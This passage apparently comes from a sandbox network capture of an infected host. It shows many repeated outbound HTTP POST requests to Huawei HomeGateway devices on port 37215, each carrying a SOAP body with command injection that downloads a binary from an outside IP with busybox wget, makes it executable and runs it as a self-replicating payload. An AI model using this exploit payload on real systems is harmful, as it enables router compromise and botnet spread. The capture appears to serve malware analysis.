                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1814192.168.2.1335898157.178.1.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638947010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1815192.168.2.1358224161.63.122.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638983011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1816192.168.2.1339634157.141.213.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638999939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1817192.168.2.1347060197.90.55.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639036894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1818192.168.2.1335574198.251.156.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639069080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1819192.168.2.1342746197.106.137.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639455080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1820192.168.2.134872238.206.127.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639534950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1821192.168.2.1351670197.147.75.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639595985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1822192.168.2.1348214197.234.230.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639596939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1823192.168.2.1339366157.215.124.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639640093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
